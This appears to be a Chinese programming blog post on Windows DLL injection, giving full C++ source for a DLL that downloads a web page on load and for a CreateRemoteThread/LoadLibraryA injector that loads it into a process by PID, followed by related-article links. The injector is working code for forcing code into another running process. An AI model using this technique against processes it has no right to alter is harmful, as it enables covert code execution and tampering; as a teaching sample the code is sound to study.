windows 注入dll

最新推荐文章于 2024-04-01 17:50:46 发布
最新推荐文章于 2024-04-01 17:50:46 发布
阅读量443 收藏
点赞数
分类专栏: VC++ 
// dllmain.cpp : 定义 DLL 应用程序的入口点。
#include "stdafx.h"
#include "windows.h"
#include "tchar.h"
#include "Urlmon.h"

#pragma comment(lib, "urlmon.lib")

#define DEF_URL "http://biancheng.dnbcw.info/c/158628.html"
#define DEF_FILE_NAME "index.html"

HMODULE g_hMod= NULL;

DWORD WINAPI ThreadProc(LPVOID lParam)
{
	char szPath[MAX_PATH] = {0};

	if (!GetModuleFileName(g_hMod, szPath, MAX_PATH))
	{
		return FALSE;
	}

	OutputDebugString(szPath);

	char *p = strrchr(szPath, '\\');

	if (!p)
	{
		return FALSE;
	}

	strcpy_s(p+1, MAX_PATH, DEF_FILE_NAME);
	OutputDebugString(szPath);
	URLDownloadToFile(NULL, DEF_URL, szPath, 0, NULL);
	
	return 0;
}

BOOL APIENTRY DllMain( HMODULE hModule,
                       DWORD  ul_reason_for_call,
                       LPVOID lpReserved
					 )
{

	HANDLE hThread = NULL;

	g_hMod = hModule;

	switch (ul_reason_for_call)
	{
	case DLL_PROCESS_ATTACH:
		{
			OutputDebugString("注入成功,开始下载Url!");

			hThread = CreateThread(NULL, 0, ThreadProc, NULL, 0, NULL);
			CloseHandle(hThread);
		}
		break;
	case DLL_THREAD_ATTACH:
	case DLL_THREAD_DETACH:
	case DLL_PROCESS_DETACH:
		break;
	}
	return TRUE;
}



// remotethread.cpp : 定义控制台应用程序的入口点。
//


#include "stdafx.h"
#include "windows.h"
#include "tchar.h"


BOOL InjrctDll(DWORD dwPid, LPCTSTR szDllPath)
{
	HANDLE hProcess = NULL, hThread = NULL;
	HMODULE hMod = NULL;
	LPVOID pRemoteBuf = NULL;
	DWORD dwBufSize = strlen(szDllPath) +1;


	LPTHREAD_START_ROUTINE pThreadProc;


	//#1 使用进程ID获取进程句柄
	if (!(hProcess = OpenProcess(PROCESS_ALL_ACCESS, FALSE, dwPid)))
	{
		printf("open process %d failed!!! [%d]\n", dwPid, GetLastError());


		return FALSE;
	}


	//#2 在目标进程分配dll大小的内存
	pRemoteBuf = VirtualAllocEx(hProcess, NULL, dwBufSize, MEM_COMMIT, PAGE_READWRITE);
	if (!pRemoteBuf)
	{
		printf("pRemoteBuf\n");
		return FALSE;
	}


	//#3 将dll路径写入分配的内存
	if (!WriteProcessMemory(hProcess, pRemoteBuf, (LPVOID)szDllPath, dwBufSize, NULL))
	{
		printf("WriteProcessMemory\n");
		return FALSE;
	}


	//#4 获取loadlibrary API的地址
	hMod = GetModuleHandle("kernel32.dll");
	if (!hMod)
	{
		printf("hMod\n");
		return FALSE;
	}


	pThreadProc = (LPTHREAD_START_ROUTINE)GetProcAddress(hMod, "LoadLibraryA");
	if (!pThreadProc)
	{
		printf("pThreadProc\n");
		return 0;
	}




	hThread = CreateRemoteThread(hProcess, NULL, 0, pThreadProc, pRemoteBuf, 0, NULL);
	if(!hThread)
	{
		printf("hThread\n");
		return 0;
	}


	WaitForSingleObject(hThread, INFINITE);
	CloseHandle(hThread);
	CloseHandle(hProcess);
	return TRUE;
}


int _tmain(int argc, _TCHAR* argv[])
{
	if (InjrctDll(42448, "E:\\qt_test\\creatremotethread\\remotethread\\Debug\\dll.dll"))
	{
		printf("succeed!!!\n");
	}
	else
	{
		printf("error!!!\n");
	}


	while(1);


	return 0;
}


杜xx
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
windows-DLL注入
08-14
windows-DLL注入整理
Windows系统的dll注入
m0_68937036的博客
03-03 1600
Windows系统的dll注入
不动声色的注入你的dll
qman007的专栏
02-18 1764
不动声色的注入你的dll
Windows编程之DLL注入
u013267687的专栏
05-07 383
我的原博文链接:http://yoursite.com/2020/05/07/Windows%E7%BC%96%E7%A8%8B%E4%B9%8BDLL%E6%B3%A8%E5%85%A5/ Windows编程中不得不懂的一项实用技巧 就是DLL动态库注入技术 关于这一系列的注入知识,后续会针对每一项技巧进行专门的博文编写 这篇博文,简单讲述现在常用的四种技巧 一、注册表注入 顾名思义,...
Windows 中的三种常用 DLL 注入技术
langshanglibie的专栏
03-30 6141
Windows 中的三种常用 DLL 注入技术 一、DLL 注入技术的用途 二、DLL 注入基础 2.1 进程虚拟地址空间 2.2 读写其他进程的内存 2.3 LoadLibraryW 函数 三、APC 注入 四、远程线程注入 五、Windows 钩子 六、全局钩子注入 一、DLL 注入技术的用途 在 Windows 中,每个进程都有自己私有的虚拟地址空间。所以,一个进程没法访问另一个进程的内存。 但是,很多时候我们还是需要跨越进程的边界,来访问另一个进程的地址空
Windows DLL注入示例
04-02
"Windows DLL注入示例"是一个关于如何在Windows环境中实现DLL注入的实践教程。它可能包含了源代码、解释和步骤指导。"说明.txt"文档应该是对整个过程的详细描述,包括注入的原理和代码实现的解析。 DLL注入的基本...
注入dll 远程注入方法
10-30
标题中的"注入dll 远程注入方法"指的是通过编程手段将DLL文件注入到一个远程正在运行的进程中。这通常涉及到以下几个关键步骤: 1. **创建远程线程**:注入的核心在于创建一个新的线程在目标进程中执行。使用`...
C# 注入DLL
10-10
在IT领域,C#注入DLL是一种技术,用于在运行时将动态链接库(DLL)加载到另一个进程中,以便扩展或修改其功能。这种方式通常用于调试、自动化测试、系统监控等多种目的。下面我们将深入探讨C#注入DLL的原理、实现...
DLL注入器.rar
04-04
DLL(Dynamic Link Library)注入是一种高级的编程技术,通常用于在其他进程上下文中执行代码,以便于调试、监控、扩展或篡改程序行为。DLL注入器是实现这一技术的工具,它允许用户将自定义的DLL文件加载到目标进程...
Windows DLL注入的方法介绍
Sudouble的专栏
06-26 1014
DLL作为公司日常用品,极大的方便了日常的开发(主要是看起来产品就很高大上了)。以下介绍几种跨进程调用DLL的方法。 从《Windows核心编程》的书中可知,Windows下各个进程间的地址是相互独立的。建立新的进程时,会为此进程开辟一块独立的虚拟地址空间,这样有助于系统的稳定。——当一个进程崩溃时,只影响一个进程,回收垃圾时也只需要对本进程地址空间内的数据进行回收即可。 虚拟地址空间由以下几...
Windows本机DLL注入库,支持几种注入方法。-.NET开发
05-27
Bleak用C#编写的Windows本机DLL注入库,支持多种注入方法。 支持的方法CreateRemoteThread ManualMap(仅x86)NtCreateThreadEx QueueUserAPC RtlCreateUserTh令人毛骨悚然的说明自2019年12月12日起已弃用,不再维护该库。 我已经重新编写了一个替代库,我认为这要好得多。 链接到新库一个Windows本机DLL注入库,它支持几种注入方法。 注入方法CreateThread HijackThread ManualMap可选扩展EjectDll HideDllFromPeb RandomiseDllHeaders RandomiseDllName功能WOW64和x64注入安装下载并安装
Windows 五种dll注入方式.zip
06-02
Windows 五种DLL注入方式总结,代码详尽,纯中文详细注释!
Qt:Windows编程—DLL注入与卸载 示例demo
01-27
https://blog.csdn.net/qq_29542611/article/details/86664781 Qt:Windows编程—DLL注入与卸载 示例demo
Windows DLL 注入技术
旋律的博客
11-15 946
Windows DLL 注入技术 本文主要介绍四种常见的 Windows DLL 注入技术。 分别为全局钩子、远线程钩子、突破 SESSION 0 隔离的远线程注入和 APC 注入。 全局钩子注入 Windows 中大部分应用是基于 Windows 的消息机制,Windows提供截获这些消息的钩子函数。 根据钩子作用的不同范围,钩子可以被分为全局和局部钩子。局部钩子是针对某个线程的,全局钩子是只要有使用消息机制的应用。接下来我们主要来看下利用SetWindowsHookEx实现全局钩子。 SetWind
WindowsDll注入与API拦截
qiexinyueaifei的博客
03-25 822
让我们来看一个例子。当这个通知被处理时,U s e r 3 2 . d l l便检索保存的这个关键字中的值,并且为字符串中指定的每个D L L调用L o a d L i b r a r y函数。当每个库被加载时,便调用与该库相关的D l l M a i n函数,其f d w R e a s o n的值是D L L _ P R O C E S S _ AT TA C H,这样,每个库就能够对自己进行初始化。在理想的情况下,你的D L L只应该映射到需要的进程中,同时,它应该以尽可能少的时间映射到这些进程中。
Windows 动态注入(远程线程、消息钩子、APC)
wangluoanquan111的博客
02-28 1093
网络安全行业产业以来,随即新增加了几十个网络安全行业岗位︰网络安全专家、网络安全分析师、安全咨询师、网络安全工程师、安全架构师、安全运维工程师、渗透工程师、信息安全管理员、数据安全工程师、网络安全运营工程师、网络安全应急响应工程师、数据鉴定师、网络安全产品经理、网络安全服务工程师、网络安全培训师、网络安全审计员、威胁情报分析工程师、灾难恢复专业人员、实战攻防专业人员…一个比较关键的问题是创建的远程线程是在目标进程中执行,无法调用本地函数,因此要利用系统API实现加载dll文件的操作。
【转】Windows提权---DLL注入/不带引号的服务路径
最新发布
tpriwwq的专栏
04-01 78
DLL注入/不带引号的服务路径
Windows核心编程:DLL注入和API拦截
shenzi的天空
10-28 1万+
 作者:shenzi链接:http://blog.csdn.net/shenzi Windows核心编程:DLL注入和API拦截     在Windows中,每个进程有自己的私有地址空间。当我们用指针来引用内存的时候,指针的值表示的是进程自己的地址空间中的一个内存地址。进程不能创建一个指针来引用属于其它进程的内存。
多种DLL注入技术原理介绍
热门推荐
顺其自然~专栏
11-06 3万+
本文中我将介绍DLL注入的相关知识。不算太糟的是,DLL注入技术可以被正常软件用来添加/扩展其他程序,调试或逆向工程的功能性;该技术也常被恶意软件以多种方式利用。这意味着从安全角度来说,了解DLL注入的工作原理是十分必要的。 不久前在为攻击方测试(目的是为了模拟不同类型的攻击行为)开发定制工具的时候,我编写了这个名为“injectAllTheThings”的小工程的大...
windowsDLL注入
05-21
DLL注入是一种常见的技术,在Windows平台上使用动态链接库(DLL)将代码注入到另一个进程的地址空间中。这种技术通常用于实现Hook、调试、反作弊和恶意软件等目的。 在Windows系统中,有很多方法可以进行DLL注入,...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值